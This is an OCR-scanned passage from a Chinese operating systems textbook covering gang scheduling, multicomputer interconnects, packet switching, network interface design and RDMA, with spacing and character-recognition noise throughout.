在 这 个 简单 的 分 区 模型 中 ， 一 个 线程 请 求 一 定数 量 的 CPU， 然 后 或 者 全 部 得 到 它们 或 者 一 直 等 到 有 
足够 数量 的 CPU 可 用 为 止 。 另 一 种 处 理 方式 是 主动 地 管理 线程 的 并 行 度 。 管 理 并 行 度 的 一 种 途径 是 使 用 
一 个 中 心服 务 器 ， 用 它 跟 踪 哪 些 线程 正在 运行 ， 哪 些 线程 希望 运行 以 及 所 需 CPU 的 最 小 和 最 大 数量 
(Tucker 和 Gupta，1989) 。 每 个 应 用 程序 周期 性 地 询问 中 心服 务 器 有 多 少 个 CPU 可 用 。 然 后 它 调整 线程 
的 数量 以 符合 可 用 的 数量 。 

例如 ， 一 台 Web 服 务 器 可 以 5、10、20 或 任何 其 他 数量 的 线程 并 行 运 行 。 如 果 它 当前 有 10 个 线程 ， 
突然 ， 系 统 对 CPU 的 需求 增加 了 ， 于 是 通知 它 可 用 的 CPU 数量 减 到 了 5 个 ， 那 么 在 接 下 来 的 5 个 线程 完成 
其 当前 工作 之 后 ,它们 就 被 通知 退出 而 不 是 给 予 新 的 工作 。 这 种 机 制 允许 分 区 大 小 动态 地 变化 ， 以 便 与 
当前 负载 相 匹 配 ， 这 种 方法 优 于 图 8-13 中 的 固定 系统 。 

3. 群 调 度 (Gang Scheduling) 

空间 共享 的 一 个 明显 优点 是 消除 了 多 道 程序 设计 ， 从 而 消除 了 上 下 文 切换 的 开销 。 但 是 ， 一 个 同样 
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明显 的 缺点 是 当 CPU 被 阻塞 或 根本 无 事 可 做 时 时 间 被 浪费 了 ， 只 有 等 到 其 再 次 就 结 。 于 是 ， 人 们 寻找 既 
可 以 调度 时 间 又 可 以 调度 空间 的 算法 ， 特 别 是 对 于 要 创建 多 个 线程 而 这 些 线程 通常 需要 彼此 通信 的 线程 。 

为 了 考察 一 个 进程 的 多 个 线程 被 独立 调度 时 会 出 现 的 问题 ， 设 想 一 个 系统 中 有 线程 Ao 和 A 属于 进程 
A， 而 线程 BO 和 B, 属 于 进程 8。 线程 Ao 和 Bo 在 CPU 0 上 分 时 ， 而 线程 Al 和 B, 在 CPU 1 上 分 时 。 线 程 Ao 和 A 
需要 经 常 通信 。 其 通信 模式 是 ，Ao 送 给 A 一 个 消息 ， 然 后 Al 回 送 给 Ao 一 个 应 答 ， 紧 跟 的 是 另 一 个 这 样 的 
序列 。 假 设 正好 是 Au 和 B, 首 先 开 始 ， 如 图 8-14 所 示 。 


线程 Ao 运行 
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图 8-14 进程 A 中 两 个 交替 运行 的 线程 间 的 通信 


在 时 间 片 0，Ao 发 给 A 一 个 请 求 ， 但 是 直到 A 在 开始 于 100ms 的 时 间 片 1 中 开始 运行 时 它 才 得 到 该 消 
息 。 它 立即 发 送 一 个 应 答 ， 但 是 直到 Ao 在 200ms 再 次 运行 时 它 才 得 到 该 应 答 。 最 终结 果 是 每 200ms 一 个 
请 求 - 应 答 序列 。 这 个 性 能 并 不 高 。 

这 一 问题 的 解决 方案 是 群 调度 (gang scheduling) ， 它 是 协同 调度 (co-scheduling; Outsterhout, 
1982) 的 发 展 产物 。 群 调度 由 三 个 部 分 组 成 : 

1) 把 一 组 相关 线程 作为 一 个 单位 ， 即 一 个 群 (gang) ， 一 起 调度 。 

2) 一 个 群 中 的 所 有 成 员 在 不 同 的 分 时 CPU 上 同时 运行 。 

3) 群 中 的 所 有 成 员 共 同 开 始 和 结束 其 时 间 片 。 
使 群 调度 正确 工作 的 关键 是 ， 同 步调 度 所 有 的 CPU。 这 意味 着 把 时 间 划 分 为 离散 的 时 间 片 ， 如 图 8-14 
中 所 示 。 在 每 一 个 新 的 时 间 片 开始 时 ， 所 有 的 CPU 都 重新 调度 ， 在 每 个 CPU 上 都 开始 一 个 新 的 线程 。 在 
后 续 的 时 间 片 开始 时 ， 另 一 个 调度 事件 发 生 。 在 这 之 间 ， 没 有 调度 行为 。 如 果 某 个 线程 被 阻塞 ， 它 的 
CPU 保持 空 凋 ， 直 到 对 应 的 时 间 片 结束 为 止 。 

有 关 群 调度 是 如 何 工 作 的 例子 在 图 8-15 中 给 
出 。 图 8-15 中 有 一 台 带 6 个 CPU 的 多 处 理 机 ， 由 5 个 
进程 A 到 E 使 用 ， 总 共有 24 个 就 绪 线 程 。 在 时 间 槽 
(time slot) 0， 线 程 Ao 至 As 被 调度 运行 。 在 时 间 槽 
1， 调 度 线程 Bo、B,、B:、Co、Ci 和 C: 被 调度 运行 。 时 间 槽 
在 时 间 模 2， 进 程 D 的 5 个 线程 以 及 Eo 运行 。 剩 下 的 
6 个 线程 属于 E， 在 时 间 模 3 中 运行 。 然 后 周期 重复 
进行 ， 时 间 槽 4 与 时 间 槽 0 一样 ， 以 此 类 推 。 

群 调度 的 思想 是 ， 让 一 个 进程 的 所 有 线程 在 图 8.15 群 调 度 
不 同 的 CPU 上 同时 运行 ， 这 样 ， 如 果 其 中 一 个 线 
程 向 另 一 个 线程 发 送 请 求 ， 接 受 方 几乎 会 立即 得 到 消息 ， 并 且 几 乎 能 够 立即 应 答 。 在 图 8-15 中 ， 由 于 进 
程 的 所 有 线程 在 同一 个 时 间 片 内 一 起 运行 ， 它 们 可 以 在 一 个 时 间 片 内 发 送 和 接受 大 量 的 消息 ， 从 而 消除 
了 图 8-14 中 的 问题 。 


8.2 多 计算 机 


多 处 理 机 流行 和 有 吸引 力 的 原因 是 ， 它 们 提供 了 一 个 简单 的 通信 模型 : 所 有 CPU 共享 一 个 公用 存储 
器 。 进 程 可 以 向 存储 器 写 消息 ， 然 后 被 其 他 进程 读 取 。 可 以 使 用 互 斥 信号 量 、 信 号 量 、 管 程 (monitor) 
和 其 他 适合 的 技术 实现 同步 。 唯 一 美中不足 的 是 ， 大 型 多 处 理 机 构造 困难 ， 因 而 造价 高 昂 。 规 模 更 大 的 
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多 处 理 机 无 论 花费 多 少 造价 也 不 可 能 完成 。 所 以 ， 如 果 要 将 CPU 数量 进一步 扩大 ， 还 需要 其 他 办 法 。 

为 了 解决 这 个 问题 ， 人 们 在 多 计算 机 (multicomputers) 领域 中 进行 了 很 多 研究 。 多 计算 机 是 紧 耦 
合 CPU ， 不 共享 存储 器 。 每 台 计 算 机 有 自己 的 存储 器 ， 如 图 8-lb 所 示 。 众 所 周知 ， 这 些 系统 有 各 种 其 他 
的 名 称 ， 如 机 群 计算 机 (cluster computers) 以 及 工作 站 机 群 (Clusters of Workstations, COWS), zit 
算 服务 都 是 建立 在 多 计算 机 上 ， 因 为 它们 需要 大 的 计算 能 力 。 

多 计算 机 容易 构造 ， 因 为 其 基本 部 件 只 是 一 台 配 有 高 性 能 网 络 接口 卡 的 PC 裸 机 ， 没 有 键盘 、 鼠 标 或 
显示 器 。 当 然 ， 获 得 高 性 能 的 秘密 是 巧妙 地 设计 互连网 络 以 及 接口 卡 。 这 个 问题 与 在 一 台 多 处 理 机 中 构 
造 共 享 存储 器 是 完全 类 似 的 〈 如 图 8-16 所 示 )。 但 是 ， 由 于 目标 是 在 微 秒 (microsecond) 数量 级 上 发 送 消 
息 ， 而 不 是 在 纳 秒 (nanosecond) 数量 级 上 访问 存储 器 ， 所 以 这 是 一 个 相对 简单 、 便 宜 且 容 易 实 现 的 任务 。 





图 8-16 各 种 互 连 拓扑 结构 : a) 单 交换 机 ，b) MH, CMs DMA, each, f) 四 维 超 立 方 体 


在 下 面 几 节 中 ， 我 们 将 首先 简要 地 介绍 多 计算 机 硬件 ， 特 别 是 互 连 硬件 。 然 后 ， 我 们 将 讨论 软件 ， 
从 低层 通信 软件 开始 ， 接 着 是 高 层 通信 软件 。 我 们 还 将 讨论 在 没有 共享 存储 器 的 系统 中 实现 共享 存储 器 
的 方法 。 最 后 ， 我 们 将 讨论 调度 和 负载 平衡 的 问题 。 


8.2.1 多 计算 机 硬件 

一 个 多 计算 机 系统 的 基本 节点 包括 一 个 CPU、 存 储 器 、 一 个 网 络 接口 ， 有 时 还 有 一 个 硬盘 。 节 点 可 
以 封装 在 标准 的 PC 机 箱 中 ， 不 过 通常 没有 图 像 适 配 卡 、 显 示 器 、 键 盘 和 鼠标 等 。 有 时 这 种 配置 被 称 为 无 
主 工 作 站 ， 因 为 没有 用 户 。 有 用 户 的 工作 站 逻辑 上 应 该 对 应 地 被 叫 作 有 主 工作 站 ， 但 实际 上 并 没有 这 么 
叫 。 在 某 些 情况 下 ，PC 机 中 有 一 块 2 通 道 或 4 通道 的 多 处 理 机 主板 ， 可 能 带 有 双核 、 四 核 或 者 八 核 芯 片 
而 不 是 单个 CPU， 不 过 为 了 简化 问题 ， 我 们 假设 每 个 节点 只 有 一 个 CPU。 通 常 成 百 个 甚至 上 千 个 节点 连 
接 在 一 起 组 成 一 个 多 计算 机 系统 。 下 面 我 们 将 介绍 多 计算 机 系统 是 如 何 组 织 的 。 

1. 互 连 技术 

在 每 个 节点 上 有 一 块 网 卡 ， 带 有 一 根 或 两 根 从 网 卡 上 接 出 的 电缆 〈 或 光纤 ) 。 这 些 电缆 或 者 连 到 其 
他 的 节点 上 ， 或 者 连 到 交换 机 上 。 在 小 型 系统 中 ， 可 能 会 有 一 个 按照 图 8-16a 的 星 形 拓扑 结构 连接 所 有 
节点 的 交换 机 。 现 代 交 换 型 以 太 网 就 采用 了 这 种 拓扑 结构 。 

作为 单一 交换 机 设计 的 另 一 种 选择 ， 节 点 可 以 组 成 一 个 环 ， 有 两 根 线 从 网 络 接口 卡 上 出 来 ， 一 根 去 
连接 左面 的 节点 ， 另 一 根 去 连接 右面 的 节点 ， 如 图 8-16b 所 示 。 在 这 种 拓扑 结构 中 不 需要 交换 机 ， 所 以 
图 中 也 没有 。 

图 8-16c 中 的 网 格 (grid 或 mesh) 是 一 种 在 许多 商业 系统 中 应 用 的 二 维 设计 。 它 相当 规整 ， 而 且 容 
易 扩 展 为 大 规模 系统 。 这 种 系统 有 一 个 直径 (diameter) ， 即 在 任意 两 个 节点 之 间 的 最 长 路 径 ， 并 且 该 值 
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只 按照 节点 数目 的 平方 根 增加 。 网 格 的 变种 是 双 凸 面 (double torus) ， 如 图 8-16d 所 示 ， 这 是 一 种 边 连 通 
的 网 格 。 这 种 拓扑 结构 不 仅 较 网 格 具 有 更 强 的 容错 能 力 而 且 其 直径 也 比较 小 ， 因 为 对 角 之 间 的 通信 只 需 
要 两 跳 。 

图 8-16e 中 的 立方 体 (cube) 是 一 种 规则 的 三 维 拓扑 结构 。 我 们 展示 的 是 2 x 2 x 2 立方 体 ， 更 一 般 的 
情形 则 是 kxkxk 立 方 体 。 在 图 8-16f 中 ， 是 一 种 用 两 个 三 维 立方 体 加 上 对 应 边 连接 所 组 成 四 维 立 方 体 。 
我 们 可 以 仿照 图 8-16f 的 结构 并 且 连 接 对 应 的 节点 以 组 成 四 个 立方 体 组 块 来 制作 五 维 立 方 体 。 为 了 实现 六 
维 ， 可 以 复制 四 个 立方 体 的 块 并 把 对 应 节点 互 连 起 来 ， 以 此 类 推 。 以 这 种 形式 组 成 的 n 维 立方 体 称 为 超 
立方 体 (hypercube)。 

许多 并 行 计算 机 采用 这 种 超 立 方 体 拓扑 结构 ， 因 为 其 直径 随 着 维 数 的 增加 线性 增长 。 换 句 话说 ， 直 
径 是 节点 数 的 自然 对 数 ， 例 如 ， 一 个 10 维 的 超 立 方 体 有 1024 个 节点 ， 但 是 其 直径 仅 为 10， 有 着 出 色 的 延 
迟 特性 。 注 意 ， 与 之 相反 的 是 ，1024 的 节点 如 果 按 照 32 x 32 网 格 布局 则 其 直径 为 62， 较 超 立 方 体 相 差 了 
六 倍 多 。 对 于 超 立 方 体 而 言 ， 获 得 较 小 直径 的 代价 是 扇 出 数量 (fanout) 以 及 由 此 而 来 的 连接 数量 (及 
成 本 ) 的 大 量 增加 。 

在 多 计算 机 中 可 采用 两 种 交换 机 制 。 在 第 一 种 机 制 里 ， 每 个 消息 首先 被 分 解 〈 由 用 户 软件 或 网 络 接 
口 进行 ) 成 为 有 最 大 长 度 限 制 的 块 ， 称 为 包 (packet) 。 该 交换 机 制 称 为 存储 转发 包 交 换 (store-and- 
forward packet switching) ， 由 源 节点 的 网 络 接口 卡 注 入 第 一 个 交换 机 的 包 组 成 ， 如 图 8-17a 所 示 。 比 特 
串 一 次 进来 一 位 ， 当 整个 包 到 达 一 个 输入 缓冲 区 时 ， 它 被 复制 到 沿 着 其 路 径 通 向 下 一 个 交换 机 的 队列 当 
中 ， 如 图 8-17b 所 示 。 当 数据 包 到 达 目 标 节点 所 连接 的 交换 机 时 ， 如 图 8-17c 所 示 ， 该 数据 包 被 复制 到 目 
标 节点 的 网 络 接口 卡 ， 并 最 终 到 达 其 RAM。 


4 端口 
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图 8-17 存储 转发 包 交换 


尽管 存储 转发 包 交 换 灵 活 且 有 效 ， 但 是 它 存在 通过 互连网 络 时 增加 时 延 (延迟 ) 的 问题 。 假 设 在 
图 8-17 中 把 一 个 包 传送 一 跳 所 花费 的 时 间 为 7 纳 秒 。 为 了 从 CPU 1 到 CPU 2， 该 包 必 须 被 复制 四 次 (至 A、 
至 C、 至 D 以 及 到 目标 CPU) ， 而 且 在 前 一 个 包 完 成 之 前 ， 不 能 开始 有 关 的 复制 ， 所 以 通过 该 互连网 络 的 
时 延 是 4T。 一 条 出 路 是 设计 一 个 网 络 ， 其 中 的 包 可 以 逻辑 地 划分 为 更 小 的 单元 。 只 要 第 一 个 单元 到 达 一 
个 交换 机 ， 它 就 被 转发 到 下 一 个 交换 机 ， 甚 至 可 以 在 包 的 结尾 到 达 之 前 进行 。 可 以 想象 ， 这 个 传送 单元 
可 以 小 到 1 比特 。 

另 一 种 交换 机 制 是 电路 交换 (circuit switching) ， 它 包括 由 第 一 个 交换 机 建立 的 ， 通 过 所 有 交换 机 
而 到 达 目 标 交 换 机 的 一 条 路 径 。 一 旦 该 路 径 建 立 起 来 ， 比 特 流 就 从 源 到 目的 地 通过 整个 路 径 不 断 地 尽快 
输送 。 在 所 涉及 的 交换 机 中 ， 没 有 中 间 缓 冲 。 电 路 交换 需要 有 一 个 建立 阶段 ， 它 需要 一 点 时 间 ， 但 是 一 
旦 建立 完成 ， 速 度 就 很 快 。 在 包 发 送 完毕 之 后 ， 该 路 径 必 须 被 拆除 。 电 路 交换 的 一 种 变种 称 为 虫 孔 路 由 
(wormhole routing)， 它 把 每 个 包 拆 成 子 包 ， 并 人 允许 第 一 个 子 包 在 整个 路 径 还 没有 完全 建立 之 前 就 开始 
流动 。 
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2. 网 络 接口 

在 多 计算 机 中 ， 所 有 节点 里 都 有 一 块 插 卡 板 ， 它 包含 节点 与 互连网 络 的 连接 ， 这 使 得 多 计算 机 连 成 
一 体 。 这 些 板 的 构造 方式 以 及 它们 如 何 同 主 CPU 和 RAM 连 接 对 操作 系统 有 重要 影响 。 这 里 简要 地 介绍 一 
些 有 关 的 内 容 。 部 分 内 容 来 源 于 (Bhoedjang, 2000), 

事实 上 在 所 有 的 多 计算 机 中 ， 接 口 板 上 都 有 一 些 用 来 存储 进出 包 的 RAM。 通 常 ， 在 包 被 传送 到 第 
一 个 交换 机 之 前 ， 这 个 要 送出 的 包 必 须 被 复制 到 接口 板 的 RAM 中 。 这 样 设计 的 原因 是 许多 互连网 络 是 
同步 的 ， 所 以 一 旦 一 个 包 的 传送 开始 ， 比 特 流 必 须 以 恒定 的 速率 连续 进行 。 如 果 包 在 主 RAM 中 ， 由 于 
内 存 总 线 上 有 其 他 的 信息 流 ， 所 以 这 个 送 到 网 络 上 的 连续 流 是 不 能 保证 的 。 在 接口 板 上 使 用 专门 的 
RAM， 就 消除 了 这 个 问题 。 这 种 设计 如 图 8-18 所 示 。 





图 8-18 网 络 接口 卡 在 多 计算 机 中 的 位 置 


同样 的 问题 还 出 现在 接收 进来 的 包 上 。 从 网 络 上 到 达 的 比特 流速 率 是 恒定 的 ， 并 且 经 常 有 非常 高 的 
速率 。- 如 果 网 络 接 口 卡 不 能 在 它们 到 达 的 时 候 实 时 存储 它们 ， 数 据 将 会 丢失 。 同 样 ， 在 这 里 试图 通过 系 
统 总 线 (例如 PCI 总 线 ) 到 达 主 RAM 是 非常 危险 的 。 由 于 网 卡通 常 插 在 PCI 总 线 上 ， 这 是 一 个 唯一 的 通 
向 主 RAM 的 连接 ， 所 以 不 可 避免 地 要 同 磁盘 以 及 每 个 其 他 的 IO 设备 竞争 总 线 。 而 把 进来 的 包 首 先 保存 
在 接口 板 的 私有 RAM 中 ， 然 后 再 把 它们 复制 到 主 RAM 中 ， 则 更 安全 些 。 

接口 板 上 可 以 有 一 个 或 多 个 DMA 通 道 ， 甚 至 在 板 上 有 一 个 完整 的 CPU (乃至 多 个 CPU)。 通 过 请 求 
在 系统 总 线 上 的 块 传送 (block transfer) ，DMA 通 道 可 以 在 接口 板 和 主 RAM 之 间 以 非常 高 的 速率 复制 包 ， 
因而 可 以 一 次 性 传送 若干 字 而 不 需要 为 每 个 字 分 别 请 求 总 线 。 不 过 ， 准 确 地 说 ， 正 是 这 种 块 传送 (CEA 
用 了 系统 总 线 的 多 个 总 线 周 期 ) 使 接口 板 上 的 RAM 的 需要 是 第 一 位 的 。 

很 多 接口 板 上 有 一 个 完整 的 CPU ， 可 能 另外 还 有 一 个 或 多 个 DMA 通 道 。 它 们 被 称 为 网 络 处 理 器 
(network processor) ， 并 且 其 功能 日 趋 强大 (El Ferkouss 等 人 ，2011)。 这 种 设计 意味 着 主 CPU 将 一 些 工 
作 分 给 了 网 卡 ， 诸 如 处 理 可 靠 的 传送 〈 如 果 底 层 的 硬件 会 丢 包 ) 、 多 播 (将 包 发 送 到 多 于 一 个 的 目的 地 )、 
压缩 /解压 缩 、 加 密 /解密 以 及 在 多 进程 系统 中 处 理 安全 事务 等 。 但 是 ， 有 两 个 CPU 则 意味 着 它们 必须 同 
步 ， 以 避免 竞争 条 件 的 发 生 ， 这 将 增加 额外 的 开销 ， 并 且 对 于 操作 系统 来 说 意味 着 要 承担 更 多 的 工作 。 

跨 层 复制 数据 是 安全 的 ， 但 不 一 定 高 效 。 例 如 ， 从 远程 Web 服 务 器 请 求 数据 的 浏览 器 将 在 浏览 器 的 
地 址 空间 中 创建 一 个 请 求 。 该 请 求 随后 被 复制 到 内 核 ， 以 便 TCP/IP 可 以 处 理 它 。 然 后 ， 数 据 被 复制 到 网 
络 接 口 的 内 存 中 。 在 另 一 端的 服务 器 中 ， 操 作 将 倒序 执行 : 数据 从 网 卡 复制 到 内 核 缓冲 区 ， 又 从 内 核 缓 
促 区 到 Web 服 务 器 。 这 个 过 程 有 着 大 量 的 复制 操作 ， 每 个 复制 操作 都 引入 了 额外 开销 ， 而 且 不 仅仅 是 复 
制 本 身 ， 这 也 对 缓存 、TLB 等 带 来 了 压力 。 因 此 ， 这 种 网 络 连 接 的 延迟 很 高 。 

下 一 节 将 讨论 尽 可 能 减少 由 复制 、 缓 存 污染 和 上 下 文 切 换 所 带 来 开销 的 技术 。 


8.2.2 低层 通信 软件 
在 多 计算 机 系统 中 高 性 能 通信 的 敌人 是 对 包 的 过 度 复 制 。 在 最 好 的 情形 下 ， 在 源 节 点 会 有 从 RAM 
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到 接口 板 的 一 次 复制 ， 从 源 接口 板 到 目的 接口 板 的 一 次 复制 (如果 在 路 径 上 没有 存储 和 转发 发 生 ) 以 及 
从 目的 接口 板 再 到 目的 地 RAM 的 一 次 复制 ， 这 样 一 共有 三 次 复制 。 但 是 ， 在 许多 系统 中 情况 要 糟糕 得 
多 。 特 别 是 ， 如 果 接 口 板 被 映射 到 内 核 虚拟 地 址 空间 中 而 不 是 用 户 虚拟 地 址 空间 的 话 ， 用 户 进 程 只 能 通 
过 发 出 一 个 陷入 到 内 核 的 系统 调用 的 方式 来 发 送 包 。 内 核 会 同时 在 输入 和 输出 时 把 包 复 制 到 自己 的 存储 
空间 去 ， 从 而 在 传送 到 网 络 上 时 避免 出 现 缺 页 异常 (page fault) 。 同 样 ， 接 收 包 的 内 核 在 有 机 会 检查 包 
之 前 ， 可 能 也 不 知道 应 该 把 进来 的 包 放 置 到 哪里 。 上 述 五 个 复制 步骤 如 图 8-18 所 示 。 

如 果 说 进出 RAM 的 复制 是 性 能 瓶颈 ， 那 么 进出 内 核 的 额外 复制 会 将 端 到 端的 延迟 加 倍 ， 并 把 吞吐 量 
(throughput) 降低 一 半 。 为 了 避免 这 种 对 性 能 的 影响 ， 不 少 多 计算 机 把 接口 板 映 射 到 用 户 空间 ， 并 允许 用 
户 进程 直接 把 包 送 到 卡 上 ， 而 不 需要 内 核 的 参与 。 尽 管 这 种 处 理 确实 改善 了 性 能 ， 但 却 带 来 了 两 个 问题 。 

首先 ， 如 果 在 节点 上 有 若干 个 进程 运行 而 且 需 要 访问 网 络 以 发 送 包 ， 该 怎么 办 ? 哪 一 个 进程 应 该 在 
其 地 址 空间 中 获得 接口 板 呢 ? 映射 拥有 一 个 系统 调用 将 接口 板 映 射 进出 一 个 虚拟 地 址 空间 ， 其 代价 是 很 
高 的 ， 但 是 ， 如 果 只 有 一 个 进程 获得 了 卡 ， 那 么 其 他 进程 该 如 何 发 送 包 呢 ?如 果 网 卡 被 映射 进 了 进程 A 
的 虚拟 地 址 空间 ， 而 所 到 达 的 包 却 是 进程 B 的 ， 又 该 怎么 办 ? 尤其 是 ， 如 果 A 和 B 属 于 不 同 的 所 有 者 ， 其 
中 任何 一 方 都 不 打算 协助 另 一 方 ， 又 怎么 办 ? 

一 个 解决 方案 是 ， 把 接口 板 映射 到 所 有 需要 它 的 进程 中 去 ， 但 是 这 样 做 就 需要 有 一 个 机 制 用 以 避免 
竞争 。 例 如 ， 如 果 A 申 明 接 口 板 上 的 一 个 缓冲 区 ， 而 由 于 时 间 片 ，B 开 始 运行 并 且 申 明 同 一 个 缓冲 区 ， 
那么 就 会 发 生 灾难 。 需 要 有 某 种 同步 机 制 ， 但 是 那些 诸如 互 斥 信号 量 (mutex) 一 类 的 机 制 需要 在 进程 
会 彼此 协作 的 前 提 下 才能 工作 。 在 有 多 个 用 户 分 享 的 环境 下 ， 所 有 的 用 户 都 希望 其 工作 尽快 完成 ， 某 个 
用 户 也 许 会 锁 住 与 接口 板 有 关 的 互 斥 信号 量 而 不 肯 释 放 。 从 这 里 得 到 的 结论 是 ， 对 于 将 接口 板 映 射 到 用 
户 空间 的 方案 ， 只 有 在 每 个 节点 上 只 有 一 个 用 户 进程 运行 时 才能 够 发 挥 作用 ， 否 则 必须 设置 专门 的 预防 
机 制 ( 例 如， 对 不 同 的 进程 可 以 把 接口 板 上 RAM 的 不 同 部 分 映射 到 各 自 的 地 址 空间 )。 

第 二 个 问题 是 ， 内 核 本 身 会 经 常 需要 访问 互连网 络 ， 例 如 ， 访 问 远程 节点 上 的 文件 系统 。 如 果 考 虑 
让 内 核 与 任何 用 户 共享 同一 块 接口 板 ， 即 便 是 基于 分 时 方式 ， 也 不 是 一 个 好 主意 。 假 设 当 板 被 映射 到 用 
户 空间 ， 收 到 了 一 个 内 核 的 包 ， 那 么 怎么 办 ? 或 者 若菜 个 用 户 进程 向 一 个 伪装 成 内 核 的 远程 机 器 发 送 了 
一 个 包 ， 又 该 怎么 办 ? 结论 是 ， 最 简单 的 设计 是 使 用 两 块 网 络 接口 板 ， 一 块 映射 到 用 户 空间 供应 用 程序 
使 用 ， 另 一 块 映射 到 内 核 空间 供 操作 系统 使 用 。 许 多 多 计算 机 就 正 是 这 样 做 的 。 

另 一 方面 , 较 新 的 网 络 接口 通常 是 多 队列 的 , 这 意味 着 它们 有 多 个 缓冲 区 可 以 有 效 地 支持 多 个 用 户 。 
例如 ，Intel 1350 系 列 网 卡 具有 8 个 发 送 和 8 个 接收 队列 ， 可 虚拟 化 为 许多 虚拟 端口 。 除 此 之 外 ， 该 网 卡 还 
支持 核 的 亲 和 性 。 有 具体 来 说 ， 它 有 自己 的 散 列 逻辑 来 将 每 个 数据 包 引 导 到 一 个 合适 的 进程 。 由 于 将 同一 
TCP 流 中 的 所 有 段 交 给 一 个 处 理 器 处 理 速度 更 快 (因为 缓存 中 总 是 有 数据 )， 因 此 该 网 卡 可 以 使 用 散 列 
逻辑 来 对 TCP 流 进行 散 列 (按照 IP 地 址 和 TCP 端 口号 )， 并 为 TCP 流 中 的 每 个 段 添 加 一 个 哈 希 值 以 保证 它 
被 特定 的 处 理 器 处 理 。 这 对 于 虚拟 化 也 很 有 用 ， 因 为 每 个 虚拟 机 都 可 以 拥有 自己 的 队列 。 

1. 节点 至 网 络 接口 通信 

下 一 个 问题 是 如 何 将 包 送 到 接口 板 上 。 最 快 的 方法 是 使 用 板 上 的 DMA 芯 片 直接 将 它们 从 RAM 复 制 
到 板 上 。 这 种 方式 的 问题 是 ，DMA 可 以 使 用 物理 地 址 而 不 是 虚拟 地 址 ， 并 且 独 立 于 CPU 运行 ， 除 非 存 
大 IO MMU。 首 先 ， 尽 管 一 个 用 户 进程 肯定 知道 它 打算 发 送 的 任何 包 所 在 的 虚拟 地 址 ， 但 它 通常 不 知道 
有 关 的 物理 地 址 。 设 计 一 个 系统 调用 进行 虚拟 地 址 到 物理 地 址 的 映射 是 不 可 取 的 ， 因 为 把 接口 板 放 到 用 
户 空间 的 首要 原因 就 是 为 了 避免 不 得 不 为 每 个 要 发 送 的 包 进 行 一 次 系统 调用 。 

另外 ， 如 果 操 作 系统 决定 替换 一 个 页 面 ， 而 DMA 芯 片 正在 从 该 页 面 复制 一 个 包 ， 就 会 传送 错误 的 
数据 。 然 而 更 加 精 糕 的 是 ， 如 果 操 作 系统 在 替换 某 一 个 页 面 的 同时 DMA 芯 片 正在 把 一 个 包 复 制 进 该 页 
面 ， 结 果 不 仅 进 来 的 包 会 丢失 ,无辜 的 存储 器 页 面 也 会 被 毁坏 ， 这 可 能 会 带 来 灾难 性 的 后 果 。 

为 了 以 避免 上 述 问 题 ， 可 采用 一 类 将 页 面条 住 和 释放 的 系统 调用 ， 把 有 关 页 面 标记 成 暂时 不 可 交换 
的 。 但 是 不 仅 需 要 有 一 个 系统 调用 和 钉 住 含有 每 个 输出 包 的 页 面 ， 还 要 有 另 一 个 系统 调用 进行 释放 工作 ， 
这 样 做 的 代价 太 大 。 如 果 包 很 小 ， 比 如 64 字 节 或 更 小 ， 就 不 能 忍受 钉 住 和 释放 每 个 缓冲 区 的 开销 。 对 于 
大 的 包 ， 比 如 说 1KB 或 更 大 ， 也 许 会 容忍 相关 开销 。 对 于 大 小 在 这 两 者 之 间 的 包 ， 就 要 取决 于 硬件 的 具 
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体 情 况 了 。 除 了 会 对 性 能 带 来 影响 ， 钉 住 和 释放 页 面 将 会 增加 软件 的 复杂 性 。 

2. 远程 直接 内 存 访 问 

在 一 些 领 域 中 ， 高 网 络 延迟 是 不 可 接受 的 。 例 如 一 些 高 性 能 计算 领域 的 应 用 ， 其 计算 时 间 十 分 依赖 
于 网 络 延 迟 ， 同 样 ， 高 频 交易 (买卖 股票 ) 也 完全 依赖 于 计算 机 Ms 级 的 极速 事务 处 理 速度 。 当 大 量 的 软 
件 都 变 得 故障 频 出 的 时 候 ， 让 计算 机 程序 在 lms 的 时 间 里 交易 价值 百 万 的 股票 是 否 明智 ， 就 成 为 就 餐 的 
哲学 家 在 不 用 忙 着 拿 又 子 时 考虑 的 问题 了 ， 但 这 不 该 是 本 书 的 内 容 。 这 里 想 说 的 是 ， 如 果 你 能 设法 降低 
延迟 ， 那 么 你 的 老板 一 定 会 很 喜欢 你 的 。 

在 上 述 情况 下 ， 降 低 数据 的 复制 量 都 需要 很 大 代价 。 为 了 应 对 这 一 问题 ， 一 些 网 络 接口 支持 远程 直 
接 内 存 访问 (RMDA) 技术 ,允许 一 台 机 器 直接 访问 另 一 台 机 器 的 内 存 。RMDA 不 需要 操作 系统 的 参与 ， 
直接 从 应 用 的 内 存 空间 中 读 取 或 写 入 数据 。 

RMDA 听 起 来 很 好 ， 但 也 有 缺点 。 就 像 普通 的 DMA 一 样 ， 通 信 节 点 的 操作 系统 必须 要 锁定 正 处 在 
数据 交换 中 的 页 面 。 同 时 ， 仅 仅 把 数据 放置 在 远程 计算 机 的 内 存 中 ， 而 其 他 程序 并 不 知晓 时 ， 则 并 不 会 
在 很 大 程度 上 降低 延迟 。RDMA 操 作成 功 时 并 不 会 发 出 明确 的 通知 ， 而 是 由 接收 者 去 轮 询 内 存 中 的 特定 
字 节 。 发 送 者 在 传输 完成 时 会 修改 该 字 节 来 通知 接收 者 新 数据 的 到 达 。 尽 管 这 个 方案 是 可 行 的 ， 但 并 不 
理想 而 且 费 时 。 

在 实际 的 高 频 交易 中 ， 网 卡 是 基于 现场 可 编程 逻辑 门 阵列 (FPGA) 定制 的 。 从 网 卡 接收 到 数据 到 
发 出 价值 几 百 万 的 购买 请 求 的 线 线 延 迟 小 于 1us。 在 1us 的 时 间 里 购买 价值 100 万 美元 的 股票 的 性 能 是 1 T 
美元 / 秒 ， 如 果 你 能 准确 把 握 涨 跌 ， 那 么 这 将 非常 好 ， 但 如 果 胆 小 的 话 就 没什么 用 了 。 操 作 系统 在 这 类 
极端 情况 下 并 不 能 发 挥 很 大 的 作用 。 


8.2.3 用 户 层 通信 软件 

在 多 计算 机 中 ， 不 同 CPU 上 的 进程 通过 互相 发 送 消息 实现 通信 。 在 最 简单 的 情况 下 ， 这 种 消息 传送 
是 暴露 给 用 户 进程 的 。 换 句 话 说， 操作 系统 提供 了 一 种 发 送 和 接收 消息 的 途径 ， 而 库 过 程 使 得 这 些 低层 
的 调用 对 用 户 进 程 可 用 。 在 较 复杂 的 情形 下 ， 通 过 使 得 远程 通信 和 看 起 来 像 过 程 调用 的 办 法 ， 将 实际 的 消 
息 传递 对 用 户 隐藏 起 来 。 下 面 将 讨论 这 两 种 方法 。 

1. 发 送 和 接收 

